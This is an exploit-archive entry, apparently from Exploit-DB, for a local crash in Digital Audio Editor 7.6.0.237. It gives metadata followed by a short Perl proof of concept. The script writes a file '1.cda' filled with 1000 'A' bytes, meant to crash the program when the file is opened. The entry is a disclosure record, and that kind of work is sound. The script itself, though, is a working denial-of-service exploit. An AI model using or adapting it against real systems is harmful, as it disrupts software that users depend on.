Digital Audio Editor 7.6.0.237 - Local Crash (PoC)

Author: h1ch4m
type: dos
platform: windows
port: 
date_added: 2010-12-15  
date_updated: 2011-01-14  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/15738.png  
application_url: http://www.exploit-db.comDigitalAudioEditor.exe  

raw file: 15738.pl  
####
####
####Exploit Title: Digital Audio Editor 7.6.0.237 Local Crash PoC
####Software Link: http://www.audioeditor.us/dae/index.htm
####Tested on: Win XP SP3
####Date: 15-12-2010
####Author:  h1ch4m
####Email: h1ch4m@live.fr
####
####

my $file= "1.cda";
my $junk = "\x41" x 1000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);